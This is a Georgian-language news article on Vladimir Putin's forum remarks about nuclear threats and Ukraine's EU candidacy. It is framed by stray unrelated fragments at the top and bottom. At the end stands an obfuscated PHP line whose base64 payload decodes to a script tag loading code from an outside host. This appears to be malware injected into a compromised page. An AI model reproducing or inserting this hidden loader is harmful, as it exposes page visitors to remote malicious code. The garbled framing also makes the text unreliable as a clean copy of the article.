celsiusi
ავერსი შნაიდერი
რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა განაცხადა, რომ რუსეთი არავის ემუქრება ბირთვული იარაღით, მაგრამ ყველამ უნდა იცოდეს, რას გამოიყენებს ის საკუთარი სუვერენიტეტის დასაცავად.
 
სანქტ-პეტერბურგის საერთაშორისო ეკონომიკურ ფორუმზე გამოსვლისას, კითხვაზე - არის თუ არა დასაბუთებული დასავლეთის ქვეყნების წარმომადგენლების განცხადებები ბირთვული ომისა და მესამე მსოფლიო ომის საფრთხის შესახებ, რუსეთის ლიდერმა ხაზგასმით აღნიშნა, რომ მოსკოვი „ისმენს ამგვარ რიტორიკას“.
 
„საიდან მოდის ეს? მათივე განცხადებებიდან. ან ერთი უპასუხისმგებლო პოლიტიკოსი რაღაცას იტყვის, მერე მეორე და ძალიან მაღალ დონეზე - ვთქვათ, საგარეო საქმეთა სამინისტროს დონეზე, ამაზე ყვირიან მაღალჩინოსნები და რა? ჩვენ ხომ არ გავჩუმდებით? შესაბამისად ვპასუხობთ, როგორც კი ვუპასუხეთ, მაშინვე ეკიდებიან ამას და ამბობენ: აი, რუსეთი გვემუქრება. ჩვენ არ ვემუქრებით, მაგრამ ყველამ უნდა იცოდეს, რა გვაქვს და რას გამოვიყენებთ ჩვენი სუვერენიტეტის დასაცავად“, - განაცხადა პუტინმა.
 
ვლადიმერ პუტინმა კომენტარი გააკეთა უკრაინის ევროკავშირის კანდიდატობის სტატუსზეც და განაცხადა, რომ ევროკავშირი არ არის სამხედრო ორგანიზაცია, ამიტომ რუსეთი არ არის წინააღმდეგი, რომ უკრაინა შეუერთდეს მას.
 
„ევროკავშირი არ არის სამხედრო ორგანიზაცია, სამხედრო-პოლიტიკური ბლოკი, ნატოსგან განსხვავებით, ამიტომ ჩვენ ყოველთვის ვამბობდით და მე ყოველთვის ვამბობდი, ჩვენი პოზიცია აქ არის თანმიმდევრული, გასაგები: ჩვენ არაფერი გვაქვს ამის საწინააღმდეგო“, - განაცხადა რუსეთის ლიდერმა.
992
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");